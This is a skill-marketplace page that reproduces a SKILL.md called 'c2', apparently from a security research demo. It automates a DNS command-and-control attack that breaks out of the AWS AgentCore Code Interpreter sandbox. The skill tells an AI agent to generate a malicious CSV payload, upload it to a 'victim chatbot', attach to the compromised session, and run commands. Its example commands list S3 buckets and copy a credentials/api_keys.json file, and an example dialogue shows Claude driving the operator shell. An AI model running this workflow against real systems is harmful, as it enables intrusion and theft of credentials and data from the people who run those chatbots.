c2 — agentcore pwning-agentcore-code-interpreter, community, agentcore, ide skills, bedrock, exfiltration, Claude Code, Cursor, Windsurf

v1.0.0
GitHub

About this Skill

Perfect for Advanced Threat Simulation Agents needing DNS C2 attack workflow automation. Pwning AI Code Interpreters for fun and profit - by Phantom Labs

# Core Topics

agentcore bedrock exfiltration
BeyondTrust BeyondTrust
[14]
[1]
Updated: 3/22/2026

Agent Capability Analysis

The c2 skill by BeyondTrust is an open-source community AI agent skill for Claude Code and other IDE workflows, helping agents execute tasks with better context, repeatability, and domain-specific guidance. Optimized for agentcore, bedrock, exfiltration.

Ideal Agent Persona

Perfect for Advanced Threat Simulation Agents needing DNS C2 attack workflow automation.

Core Value

Empowers agents to automate DNS C2 attack workflows using CSV uploads and command execution, leveraging uv run c2 CLI commands for seamless session management and interaction with the C2 server via DNS queries.

Capabilities Granted for c2

Automating DNS C2 attack workflows for sandbox breakout demos
Generating malicious CSV payloads for chatbot exploitation
Executing commands on compromised sessions for vulnerability demonstration

! Prerequisites & Limits

  • Requires attacker infrastructure deployment and C2 server setup
  • Session timeouts after ~15 minutes, requiring new CSV generation and upload
  • Dependent on specific directory structure and file access (e.g., attacker-infra/)
Labs Demo

Browser Sandbox Environment

⚡️ Ready to unleash?

Experience this Agent in a zero-setup browser environment powered by WebContainers. No installation required.

Boot Container Sandbox

c2

Install c2, an AI agent skill for AI agent workflows and automation. Works with Claude Code, Cursor, and Windsurf with one-command setup.

SKILL.md
Readonly

DNS C2 Operator Skill

This skill automates the DNS C2 attack workflow for the AgentCore sandbox breakout demo.

Prerequisites

Before using this skill, ensure:

  1. Attacker infrastructure is deployed (cd attacker-infra && make deploy)
  2. The C2 server is running (happens automatically during deploy)

Quick Commands (from repo root)

bash
1# Generate malicious CSV (session ID saved to attacker-infra/.session_id)
2make generate-csv
3
4# Attach to session (auto-reads .session_id)
5make attach
6
7# Or use the c2 CLI directly from attacker-infra/
8cd attacker-infra
9uv run c2 generate-csv
10uv run c2 attach

Usage Modes

Mode 1: Generate and Upload CSV

When the user wants to attack via CSV upload:

  • "Generate a malicious CSV"
  • "Create a payload for the chatbot"

Workflow:

  1. Run make generate-csv from repo root
  2. Note the session ID (also saved to attacker-infra/.session_id)
  3. Upload attacker-infra/malicious_data.csv to victim chatbot
  4. Run make attach to connect to the session

Mode 2: Attach to Session

When the user wants to connect to an active session:

  • "Attach to the C2 session"
  • "Connect to session sess_abc12345"

Workflow:

bash
1# Auto-read session ID from .session_id
2make attach
3
4# Or specify manually
5cd attacker-infra && uv run c2 attach sess_abc12345

Mode 3: Execute Commands

Once attached, send commands in the operator shell:

  • whoami - Check current user
  • aws s3 ls - List S3 buckets
  • aws sts get-caller-identity - Check IAM identity
  • exit - Disconnect (session stays active)

CLI Reference

All commands run from attacker-infra/ directory:

bash
1# Generate payload
2uv run c2 generate-csv
3
4# Attach to session (reads from .session_id if no argument)
5uv run c2 attach [SESSION_ID]
6
7# Send single command
8uv run c2 send "whoami" --session sess_abc12345
9
10# Receive output
11uv run c2 receive --session sess_abc12345
12
13# Check C2 server status
14uv run c2 status

Common Demo Commands

After attaching to a session, demonstrate the vulnerability:

bash
1whoami
2aws sts get-caller-identity
3aws s3 ls
4aws s3 ls s3://victim-chatbot-sensitive-* --recursive
5aws s3 cp s3://victim-chatbot-sensitive-*/credentials/api_keys.json -
6aws dynamodb list-tables

Error Handling

"Cannot reach C2 server"

The C2 server may not be running. Run: cd attacker-infra && make configure-ec2

Empty output after polling

The payload may not have executed. Check:

  • Victim chatbot is accessible
  • CSV was uploaded and processed
  • DNS queries reaching C2: make logs

Session timeout

Code Interpreter sessions timeout after ~15 minutes. Generate a new CSV and re-upload.

Example Full Workflow

User: Generate a payload for the victim chatbot

Claude runs: make generate-csv
Output: Session ID sess_x7k2m9p1 saved to .session_id

User: I uploaded the CSV, now connect

Claude runs: make attach
-> Connects to sess_x7k2m9p1

User: Run whoami

Claude (in operator shell): whoami
Output: genesis1ptools

User: Check what AWS access we have

Claude: aws sts get-caller-identity
Output: {"Account": "445570921298", "Arn": "arn:aws:sts::..."}

FAQ & Installation Steps

These questions and steps mirror the structured data on this page for better search understanding.

? Frequently Asked Questions

What is c2?

Perfect for Advanced Threat Simulation Agents needing DNS C2 attack workflow automation. Pwning AI Code Interpreters for fun and profit - by Phantom Labs

How do I install c2?

Run the command: npx killer-skills add BeyondTrust/pwning-agentcore-code-interpreter. It works with Cursor, Windsurf, VS Code, Claude Code, and 19+ other IDEs.

What are the use cases for c2?

Key use cases include: Automating DNS C2 attack workflows for sandbox breakout demos, Generating malicious CSV payloads for chatbot exploitation, Executing commands on compromised sessions for vulnerability demonstration.

Which IDEs are compatible with c2?

This skill is compatible with Cursor, Windsurf, VS Code, Trae, Claude Code, OpenClaw, Aider, Codex, OpenCode, Goose, Cline, Roo Code, Kiro, Augment Code, Continue, GitHub Copilot, Sourcegraph Cody, and Amazon Q Developer. Use the Killer-Skills CLI for universal one-command installation.

Are there any limitations for c2?

Requires attacker infrastructure deployment and C2 server setup. Session timeouts after ~15 minutes, requiring new CSV generation and upload. Dependent on specific directory structure and file access (e.g., attacker-infra/).

How To Install

  1. 1. Open your terminal

    Open the terminal or command line in your project directory.

  2. 2. Run the install command

    Run: npx killer-skills add BeyondTrust/pwning-agentcore-code-interpreter. The CLI will automatically detect your IDE or AI agent and configure the skill.

  3. 3. Start using the skill

    The skill is now active. Your AI agent can use c2 immediately in the current project.

Related Skills

Looking for an alternative to c2 or another community skill for your workflow? Explore these related open-source skills.

View All

widget-generator

Logo of f
f

f.k.a. Awesome ChatGPT Prompts. Share, discover, and collect prompts from the community. Free and open source — self-host for your organization with complete privacy.

149.6k
0
AI

flags

Logo of vercel
vercel

flags is a Next.js feature management skill that enables developers to efficiently add or modify framework feature flags, streamlining React application development.

138.4k
0
Browser

zustand

Logo of lobehub
lobehub

The ultimate space for work and life — to find, build, and collaborate with agent teammates that grow with you. We are taking agent harness to the next level — enabling multi-agent collaboration, effortless agent team design, and introducing agents as the unit of work interaction.

72.8k
0
AI

data-fetching

Logo of lobehub
lobehub

The ultimate space for work and life — to find, build, and collaborate with agent teammates that grow with you. We are taking agent harness to the next level — enabling multi-agent collaboration, effortless agent team design, and introducing agents as the unit of work interaction.

72.8k
0
AI